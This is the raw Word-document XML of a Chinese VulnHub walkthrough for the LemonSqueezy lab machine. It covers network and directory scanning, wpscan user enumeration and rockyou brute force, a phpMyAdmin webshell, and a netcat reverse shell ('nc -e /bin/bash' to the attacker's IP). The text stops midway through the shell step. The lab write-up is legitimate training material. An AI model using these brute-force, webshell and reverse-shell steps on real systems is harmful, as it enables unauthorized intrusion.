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B60F9" w14:textId="336CB5F8" w:rsidR="006D287F" w:rsidRDefault="00DD06E6" w:rsidP="00DD06E6">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x00:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8DCD06" w14:textId="0619FEF3" w:rsidR="00DD06E6" w:rsidRDefault="00DD06E6" w:rsidP="00DD06E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载链接:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD06E6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00DF4809">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/lemonsqueezy-1,473/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E32D9F6" w14:textId="546B58A0" w:rsidR="00DD06E6" w:rsidRDefault="00DD06E6" w:rsidP="00DD06E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看了一下描述是新手级别的跟M</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">r Robot, Lazyssadmin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那些靶机类似</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160A6F9E" w14:textId="3533CFC9" w:rsidR="00DD06E6" w:rsidRDefault="00DD06E6" w:rsidP="00DD06E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="769F5D39" wp14:editId="23D20CB9">
            <wp:extent cx="5274310" cy="1065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2DCF" w14:textId="6D5A80E6" w:rsidR="00DD06E6" w:rsidRDefault="00DD06E6" w:rsidP="00DD06E6"/>
    <w:p w14:paraId="440FEB3E" w14:textId="3501B6C4" w:rsidR="00DD06E6" w:rsidRDefault="00DD06E6" w:rsidP="00DD06E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载完以后解压是已经安装好的了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCD5FD0" w14:textId="38B45680" w:rsidR="00DD06E6" w:rsidRDefault="00DD06E6" w:rsidP="00DD06E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B222EB1" wp14:editId="4D906D0C">
            <wp:extent cx="5274310" cy="2280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50FA" w14:textId="26781D92" w:rsidR="00DD06E6" w:rsidRDefault="00DD06E6" w:rsidP="00DD06E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在V</w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中打开L</w:t>
      </w:r>
      <w:r>
        <w:t>emonSqueezy.vmx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就会自动导入了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747BB5C1" w14:textId="69132D2C" w:rsidR="00DD06E6" w:rsidRDefault="00DD06E6" w:rsidP="00DD06E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="530567FD" wp14:editId="7072FCE2">
            <wp:extent cx="4394426" cy="31116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E799" w14:textId="5CEFD7A7" w:rsidR="00DD06E6" w:rsidRDefault="00DD06E6" w:rsidP="00DD06E6"/>
    <w:p w14:paraId="78310A6A" w14:textId="3FA0DFC4" w:rsidR="00DD06E6" w:rsidRDefault="00DD06E6" w:rsidP="00DD06E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还是要调一下网络模式为N</w:t>
      </w:r>
      <w:r>
        <w:t>AT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式</w:t>
      </w:r>
      <w:r w:rsidR="00EB52D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,设置完成开机就可以了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E220E31" w14:textId="051BE406" w:rsidR="00DD06E6" w:rsidRDefault="00DD06E6" w:rsidP="00DD06E6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08929387" wp14:editId="779D45C5">
            <wp:extent cx="3029106" cy="2228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17B" w14:textId="19B52D6F" w:rsidR="00EB52D2" w:rsidRDefault="00EB52D2" w:rsidP="00DD06E6"/>
    <w:p w14:paraId="569CBCE3" w14:textId="0F53912E" w:rsidR="00EB52D2" w:rsidRDefault="00EB52D2" w:rsidP="00EB52D2">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x01:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>探测靶机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F54EC8" w14:textId="5746A264" w:rsidR="00EB52D2" w:rsidRDefault="00EB52D2" w:rsidP="00EB52D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先先用n</w:t>
      </w:r>
      <w:r>
        <w:t>etdiscover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确认一波I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，排除.</w:t>
      </w:r>
      <w:r>
        <w:t>2,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认网关可以确认靶机I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为192.168.184.162</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181048AB" w14:textId="1D06CBA5" w:rsidR="00EB52D2" w:rsidRDefault="00EB52D2" w:rsidP="00EB52D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t>netdiscover -r 192.168.184.0/16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBF5252" w14:textId="28BF32A3" w:rsidR="00EB52D2" w:rsidRDefault="00EB52D2" w:rsidP="00EB52D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11897D50" wp14:editId="71986F58">
            <wp:extent cx="3797495" cy="33656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6BCF" w14:textId="4FDB392B" w:rsidR="00EB52D2" w:rsidRDefault="00EB52D2" w:rsidP="00EB52D2"/>
    <w:p w14:paraId="282D0568" w14:textId="47D70C32" w:rsidR="00EB52D2" w:rsidRDefault="00EB52D2" w:rsidP="00EB52D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后就是用Nmap扫描一波端口</w:t>
      </w:r>
      <w:r w:rsidR="00D0137E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,只不过只开了80端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37685250" w14:textId="2086D842" w:rsidR="00EB52D2" w:rsidRDefault="00EB52D2" w:rsidP="00EB52D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t>nmap -A -sS -sV -v -p- 192.168.184.162</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B9579B" w14:textId="1FFBBEA5" w:rsidR="00EB52D2" w:rsidRDefault="00EB52D2" w:rsidP="00EB52D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F4A7369" wp14:editId="27B4E53B">
            <wp:extent cx="3302170" cy="7620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89AC" w14:textId="43275B22" w:rsidR="00D0137E" w:rsidRDefault="00D0137E" w:rsidP="00EB52D2"/>
    <w:p w14:paraId="57E00469" w14:textId="5E412694" w:rsidR="00D0137E" w:rsidRDefault="00D0137E" w:rsidP="00EB52D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用d</w:t>
      </w:r>
      <w:r>
        <w:t>irb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录扫描,可以发现点有趣的东西,</w:t>
      </w:r>
      <w:r>
        <w:t>phpMyAdmin, wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3B2CEC" w14:textId="18F26C1F" w:rsidR="00D0137E" w:rsidRDefault="00D0137E" w:rsidP="00EB52D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dirb </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00DF4809">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>http://192.168.184.162</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="761E98CC" w14:textId="0471D469" w:rsidR="00D0137E" w:rsidRDefault="00D0137E" w:rsidP="00EB52D2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EB7D147" wp14:editId="71C83E5C">
            <wp:extent cx="3378374" cy="66043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6F0D" w14:textId="17925B13" w:rsidR="00D0137E" w:rsidRDefault="00D0137E" w:rsidP="00EB52D2"/>
    <w:p w14:paraId="64BCB1C8" w14:textId="1B8D2123" w:rsidR="00D0137E" w:rsidRDefault="00D0137E" w:rsidP="00D0137E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x02:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挖掘信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103D0A8B" w14:textId="113B7E1D" w:rsidR="00D0137E" w:rsidRDefault="00D800C1" w:rsidP="00D0137E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里先拜访一下/</w:t>
      </w:r>
      <w:r>
        <w:t>wordpress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下，然而发现好像返回不太正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E0E7E7" w14:textId="3261E44B" w:rsidR="00D800C1" w:rsidRDefault="00D800C1" w:rsidP="00D0137E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32E58DCE" wp14:editId="00835E61">
            <wp:extent cx="5274310" cy="31826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63EC" w14:textId="01071528" w:rsidR="005F00EE" w:rsidRDefault="005F00EE" w:rsidP="00D0137E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>用v</w:t>
      </w:r>
      <w:r>
        <w:t>im</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加一下I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和名字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707FEF34" w14:textId="07C34719" w:rsidR="00D800C1" w:rsidRDefault="005F00EE" w:rsidP="00D0137E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BC54AEC" wp14:editId="512B8B44">
            <wp:extent cx="3397425" cy="102240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39F6" w14:textId="356307E6" w:rsidR="005F00EE" w:rsidRDefault="005F00EE" w:rsidP="00D0137E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面回显正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD0D684" w14:textId="3332D26E" w:rsidR="005F00EE" w:rsidRDefault="005F00EE" w:rsidP="00D0137E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F4965ED" wp14:editId="0B4F3864">
            <wp:extent cx="5274310" cy="22009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190" w14:textId="71D167F3" w:rsidR="005F00EE" w:rsidRDefault="005F00EE" w:rsidP="00D0137E"/>
    <w:p w14:paraId="098DC992" w14:textId="5882A222" w:rsidR="005F00EE" w:rsidRDefault="005F00EE" w:rsidP="00D0137E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来开始用w</w:t>
      </w:r>
      <w:r>
        <w:t>pscan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫出两个用户 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lemon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和o</w:t>
      </w:r>
      <w:r>
        <w:t>range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存下来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71501CF9" w14:textId="6C1FC819" w:rsidR="005F00EE" w:rsidRDefault="005F00EE" w:rsidP="00D0137E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F00EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F00EE">
        <w:t>wpscan --url http://192.168.184.162/wordpress/ -eu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4C62A4" w14:textId="51CAD9B2" w:rsidR="005F00EE" w:rsidRDefault="005F00EE" w:rsidP="00D0137E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39524559" wp14:editId="38DD0C51">
            <wp:extent cx="5274310" cy="121666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6C96" w14:textId="4D4A8DED" w:rsidR="005F00EE" w:rsidRDefault="005F00EE" w:rsidP="00D0137E"/>
    <w:p w14:paraId="40339E81" w14:textId="6C058F54" w:rsidR="005F00EE" w:rsidRDefault="005F00EE" w:rsidP="00D0137E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于没有像D</w:t>
      </w:r>
      <w:r>
        <w:t>C:2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那样有提示可以爬虫密码，只能用kali自带的字典进行一波爆破</w:t>
      </w:r>
      <w:r w:rsidR="00B830C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,最后跑出o</w:t>
      </w:r>
      <w:r w:rsidR="00B830C7">
        <w:t>range: ginger</w:t>
      </w:r>
      <w:r w:rsidR="00B830C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户出来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC3B686" w14:textId="2B3E32A9" w:rsidR="005F00EE" w:rsidRDefault="005F00EE" w:rsidP="00D0137E"/>
    <w:p w14:paraId="0C2A3A2A" w14:textId="1A3624D6" w:rsidR="005F00EE" w:rsidRDefault="005F00EE" w:rsidP="00D0137E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r w:rsidR="00B830C7" w:rsidRPr="00B830C7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B830C7" w:rsidRPr="005F00EE">
        <w:t xml:space="preserve">wpscan --url </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00B830C7" w:rsidRPr="00DF4809">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>http://192.168.184.162/wordpress/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B830C7">
        <w:t xml:space="preserve"> -U 3.txt -P /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2FE8BB" w14:textId="0B002740" w:rsidR="00B830C7" w:rsidRDefault="00B830C7" w:rsidP="00D0137E"/>
    <w:p w14:paraId="1FEE8982" w14:textId="009125F8" w:rsidR="00B830C7" w:rsidRDefault="00B830C7" w:rsidP="00D0137E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68CF8DC3" wp14:editId="58CBD056">
            <wp:extent cx="3460928" cy="438173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3A6A" w14:textId="440E2CE8" w:rsidR="00B830C7" w:rsidRDefault="00B830C7" w:rsidP="00D0137E"/>
    <w:p w14:paraId="7BA105A6" w14:textId="77777777" w:rsidR="00B830C7" w:rsidRDefault="00B830C7" w:rsidP="00D0137E"/>
    <w:p w14:paraId="45A509F0" w14:textId="77777777" w:rsidR="00B830C7" w:rsidRDefault="00B830C7" w:rsidP="00D0137E"/>
    <w:p w14:paraId="772E660A" w14:textId="77777777" w:rsidR="00B830C7" w:rsidRDefault="00B830C7" w:rsidP="00D0137E"/>
    <w:p w14:paraId="6EDD8B5B" w14:textId="5A13CF66" w:rsidR="00B830C7" w:rsidRDefault="00B830C7" w:rsidP="00D0137E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>登录w</w:t>
      </w:r>
      <w:r>
        <w:t>p-admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台后，发现有个标题，k</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eep this safe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还有一串字符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2CF254" w14:textId="45085080" w:rsidR="00B830C7" w:rsidRDefault="00B830C7" w:rsidP="00D0137E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CC7410A" wp14:editId="66B1B5EA">
            <wp:extent cx="5274310" cy="26041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0D2C" w14:textId="7D513EA2" w:rsidR="00B830C7" w:rsidRDefault="00B830C7" w:rsidP="00D0137E"/>
    <w:p w14:paraId="30DCC0B1" w14:textId="657988AC" w:rsidR="00B830C7" w:rsidRDefault="00B830C7" w:rsidP="00D0137E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试拿到p</w:t>
      </w:r>
      <w:r>
        <w:t>hpadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为密码以后成功登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027D1B36" w14:textId="08FE2498" w:rsidR="00B830C7" w:rsidRDefault="00B830C7" w:rsidP="00D0137E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10A74753" wp14:editId="71E6080F">
            <wp:extent cx="5274310" cy="34042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8FAC" w14:textId="476A72A8" w:rsidR="006F3A30" w:rsidRDefault="006F3A30" w:rsidP="00D0137E"/>
    <w:p w14:paraId="59BD6136" w14:textId="2EC9B73A" w:rsidR="006F3A30" w:rsidRDefault="006F3A30" w:rsidP="006F3A30">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x03:</w:t>
      </w:r>
      <w:r w:rsidR="00A51EE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B082C4D" w14:textId="1747FBAB" w:rsidR="00AB7E38" w:rsidRDefault="00A51EE2" w:rsidP="00AB7E38">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于在p</w:t>
      </w:r>
      <w:r>
        <w:t>hpadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面写一句话首先创建一个新的表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E8538" w14:textId="77777777" w:rsidR="00A51EE2" w:rsidRDefault="00A51EE2" w:rsidP="00AB7E38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30BEF20C" w14:textId="599994BA" w:rsidR="00A51EE2" w:rsidRDefault="00A51EE2" w:rsidP="00AB7E38">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C23046C" wp14:editId="4F75FD52">
            <wp:extent cx="3994355" cy="1066855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862C" w14:textId="3273C87C" w:rsidR="00A51EE2" w:rsidRDefault="00A51EE2" w:rsidP="00AB7E38"/>
    <w:p w14:paraId="1EDF0F78" w14:textId="5BD196E7" w:rsidR="00A51EE2" w:rsidRDefault="00A51EE2" w:rsidP="00AB7E38">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后在S</w:t>
      </w:r>
      <w:r>
        <w:t>QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里插入一句话</w:t>
      </w:r>
      <w:r w:rsidR="00280F2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后点击下面的G</w:t>
      </w:r>
      <w:r w:rsidR="00280F2E">
        <w:t>O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A050829" w14:textId="12970FC3" w:rsidR="00A51EE2" w:rsidRDefault="00A51EE2" w:rsidP="00AB7E38">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B6FC998" wp14:editId="57E28192">
            <wp:extent cx="4032457" cy="38102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846" w14:textId="00FB4442" w:rsidR="00280F2E" w:rsidRDefault="00280F2E" w:rsidP="00AB7E38"/>
    <w:p w14:paraId="42764EC0" w14:textId="1303EBFD" w:rsidR="00280F2E" w:rsidRDefault="00280F2E" w:rsidP="00AB7E38">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里由于重启了一下要重新弄I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变成192</w:t>
      </w:r>
      <w:r>
        <w:t>.168.184.163,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入?</w:t>
      </w:r>
      <w:r>
        <w:t>cmd=whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以成功执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337E32C6" w14:textId="18810E5F" w:rsidR="00280F2E" w:rsidRDefault="00280F2E" w:rsidP="00AB7E38">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41828C59" wp14:editId="1A735297">
            <wp:extent cx="5073911" cy="114305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149A" w14:textId="54470A34" w:rsidR="00280F2E" w:rsidRDefault="00280F2E" w:rsidP="00AB7E38"/>
    <w:p w14:paraId="445F42FC" w14:textId="7F9657A3" w:rsidR="00280F2E" w:rsidRDefault="00280F2E" w:rsidP="00AB7E38">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后输入一条反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AD0C50" w14:textId="14ABD92E" w:rsidR="00280F2E" w:rsidRDefault="00280F2E" w:rsidP="00AB7E38">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r w:rsidRPr="00280F2E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00280F2E">
        <w:t>nc -e /bin/bash 192.168.184.128 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB788D6" w14:textId="33BF233A" w:rsidR="00280F2E" w:rsidRDefault="00280F2E" w:rsidP="00AB7E38">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="419F785C" wp14:editId="3061D1EC">
            <wp:extent cx="4686541" cy="4826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2F67" w14:textId="3BEBD098" w:rsidR="00280F2E" w:rsidRDefault="00280F2E" w:rsidP="00AB7E38"/>
    <w:p w14:paraId="60AE3B8C" w14:textId="30C7E822" w:rsidR="00280F2E" w:rsidRDefault="00280F2E" w:rsidP="00AB7E38">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记得提前开启n</w:t>
      </w:r>
      <w:r>
        <w:t>etcat,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功反弹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00212750" w14:textId="037D3EDD" w:rsidR="00280F2E" w:rsidRDefault="00280F2E" w:rsidP="00AB7E38">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F8DC1D4" wp14:editId="415C0D76">
